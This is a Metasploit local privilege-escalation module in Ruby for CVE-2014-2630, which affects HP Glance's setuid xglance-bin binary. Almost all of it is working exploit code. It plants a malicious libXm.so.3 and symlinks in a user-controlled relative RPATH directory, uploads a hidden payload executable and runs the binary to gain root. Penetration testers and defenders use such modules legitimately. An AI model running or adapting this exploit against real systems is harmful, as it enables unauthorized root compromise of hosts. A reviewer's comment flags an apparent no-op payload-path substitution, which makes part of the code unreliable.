##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege escalation for HP Glance / Performance Monitoring (CVE-2014-2630).
#
# xglance-bin is setuid and was linked with an RPATH containing the relative
# entry "-L/lib64/". The module creates "<WritableDir>/-L/lib64/", places a
# libXm.so.3 there (plus symlinks for the other libX* names the binary
# resolves through that RPATH), uploads a payload executable, and runs
# xglance-bin from <WritableDir> so the library is loaded with elevated
# privileges.
#
# On-disk artifacts (relevant for cleanup and for defenders looking for
# evidence of use): the "-L" directory tree under WritableDir, the dropped
# libXm.so.3 and its symlinks, and a hidden payload file in WritableDir.
# The "-L" directory is registered with FileDropper for removal; the payload
# file is not.
class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  # Runs #check before #exploit so a patched or missing binary is not exploited.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Performance Monitoring xglance Priv Esc',
        'Description' => %q{
          This exploit takes advantage of xglance-bin, part of
          HP's Glance (or Performance Monitoring) version 11 'and subsequent'
          , which was compiled with an insecure RPATH option. The RPATH includes
          a relative path to -L/lib64/ which can be controlled by a user.
          Creating libraries in this location will result in an
          escalation of privileges to root.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Tim Brown', # original finding
          'Robert Jaroszuk', # exploit
          'Marco Ortisi', # exploit
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
        ],
        'Privileged' => true,
        'References' => [
          [ 'EDB', '48000' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
          [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
          [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
          [ 'PACKETSTORM', '156206' ],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
          [ 'CVE', '2014-2630' ]
        ],
        'DisclosureDate' => '2014-11-19',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options [
      OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Simplify pulling the writable directory variable
  #
  # @return [String] the WritableDir option as a string
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Directory that satisfies the binary's relative RPATH entry "-L/lib64/"
  # when xglance-bin is started from base_dir. Note the trailing slash:
  # callers append file names directly to this value.
  #
  # @return [String] "<WritableDir>/-L/lib64/"
  def exploit_folder
    "#{base_dir}/-L/lib64/"
  end

  # @return [String] the GLANCE_PATH option as a string
  def glance_path
    datastore['GLANCE_PATH'].to_s
  end

  # Pull the exploit binary or file (.c typically) from our system
  #
  # @param file [String] file name under data/exploits/CVE-2014-2630/
  # @return [String] the file's raw bytes
  def exploit_data(file)
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
  end

  # Ask ldd which libX* library xglance-bin resolves through the relative
  # "-L/lib64" RPATH entry.
  #
  # @return [String, nil] the library file name (e.g. "libX....so.N") when the
  #   binary still resolves one through -L/lib64, nil otherwise (patched build)
  def find_libs
    libs = cmd_exec "ldd #{glance_path} | grep libX"
    # A regexp literal on the left of =~ binds the named capture to a local
    # variable `lib`; it stays nil when there is no match.
    %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs
    return nil if lib.nil?

    lib
  end

  # Vulnerability check, also run automatically by AutoCheck before #exploit.
  #
  # @return [Msf::Exploit::CheckCode] Safe when the binary is missing, not
  #   setuid, or no longer linked through -L/lib64; Appears otherwise
  def check
    return CheckCode::Safe("#{glance_path} file not found") unless file? glance_path
    return CheckCode::Safe("#{glance_path} is not setuid") unless setuid? glance_path

    lib = find_libs
    if lib.nil?
      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'
      return CheckCode::Safe
    end
    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"
    CheckCode::Appears
  end

  # Stage the library and payload, then run xglance-bin. The step order
  # matters: the old "-L" tree is removed, recreated and registered for
  # cleanup before anything is written into it.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the session is already
  #   root (unless ForceExploit is set) or WritableDir is not writable
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # delete exploit folder in case a previous attempt failed
    vprint_status("Deleting exploit folder: #{base_dir}/-L")
    rm_cmd = "rm -rf \"#{base_dir}/-L\""
    cmd_exec(rm_cmd)
    # make folder
    vprint_status("Creating exploit folder: #{exploit_folder}")
    cmd_exec "mkdir -p #{exploit_folder}"
    # FileDropper removes the whole "-L" tree (library and symlinks) on cleanup.
    register_dir_for_cleanup "#{base_dir}/-L"

    # drop our .so on the system that calls our payload
    # we need gcc to compile instead of metasm since metasm
    # removes unused variables, which we need to keep xglance-bin
    # from breaking and not launching our exploit
    so_file = "#{exploit_folder}libXm.so.3"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      # Hidden, randomly named payload file directly under WritableDir.
      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
      code = exploit_data('CVE-2014-2630.c')
      # NOTE(review): this replaces payload_path with itself, so the .c source
      # is not actually edited here; the placeholder the source uses is not
      # visible from this file - confirm against data/exploits/CVE-2014-2630/.
      code.sub!(payload_path.to_s, payload_path) # inject our payload path
      upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
      # upload_and_compile leaves the source next to the output; remove it.
      rm_f "#{so_file}.c"
    else
      # The pre-built library uses this fixed payload path, so it is not
      # randomized in this branch.
      payload_path = '/tmp/.u4aLoiq'
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx so_file, exploit_data('libXm.so.3')
    end

    # Upload payload executable
    # Not registered for cleanup; it is only mentioned in the final warning.
    vprint_status 'uploading payload'
    upload_and_chmodx payload_path, generate_payload_exe

    # link so files to exploit vuln
    lib = find_libs
    # just to be safe, Xt and Xp were in the original exploit
    # our mock binary is also exploitsable through libXmu.so.6
    # unsure about the real binary
    # Relative symlinks are created from inside exploit_folder so they point
    # at the libXm.so.3 dropped above. If find_libs returned nil (which
    # AutoCheck normally prevents), the last ln call gets an empty name.
    cd exploit_folder
    ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
      cmd_exec "ln -s libXm.so.3 #{l}"
    end

    # Launch exploit
    # Executed from base_dir, presumably so the relative RPATH entry
    # "-L/lib64/" resolves to exploit_folder.
    print_status 'Launching xglance-bin...'
    cd base_dir
    output = cmd_exec glance_path
    output.each_line { |line| vprint_status line.chomp }
    print_warning("Manual cleanup of #{exploit_folder} may be required")
  end
end